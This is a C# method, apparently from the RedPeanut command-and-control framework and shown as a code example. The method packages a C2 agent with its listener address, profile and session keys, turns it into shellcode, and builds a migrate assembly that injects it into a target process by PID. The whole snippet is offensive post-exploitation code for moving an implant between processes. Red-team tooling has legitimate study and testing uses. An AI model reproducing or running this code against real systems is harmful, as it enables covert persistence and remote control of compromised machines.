Exemplo n.º 1
0
        private void RunMigrate(int pid)
        {
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            //Create RedPeanutAgent assembly
            string source = File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));

            ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), RedPeanutC2.server.GetProfile(((AgentInstanceHttp)agent).GetProfileid()), ((AgentInstanceHttp)agent).GetProfileid());

            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), ((AgentInstanceHttp)agent).TargetFramework, conf);
            string b64CompressedAgent = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Agent)));
            string instanceid         = RandomAString(10, new Random());

            //Create AgentState
            AgentState astate = new AgentState
            {
                Agentid           = agent.AgentId,
                sessionkey        = agent.AesManager.Key,
                sessioniv         = agent.AesManager.IV,
                cookie            = ((AgentInstanceHttp)agent).Cookie,
                RequestInstanceid = instanceid
            };

            if (agent.Pivoter != null)
            {
                astate.pipename = agent.Pivoter.AgentId;
            }

            string b64State = Convert.ToBase64String(Utility.CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(astate, Formatting.Indented))));

            string[] argsm = Utility.Split(b64State, 100).ToArray();

            //Read template
            source = File.ReadAllText(Path.Combine(folderrpath, MIGRATE_TEMPLATE));
            //Replace
            source = Replacer.ReplaceMigrate(source, Convert.ToBase64String(CompressGZipAssembly(
                                                                                Builder.GenerateShellcode(b64CompressedAgent, RandomAString(10, new Random()) + ".exe", "RedPeanutAgent.Worker", "LoadAndRun", argsm)
                                                                                )), pid);
            //Run
            string migrate = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Migrate)));

            RunAssemblyBase64(
                migrate,
                "RedPeanutMigrate",
                new string[] { " " },
                agent, tasktype: "migrate", instanceid: instanceid);
        }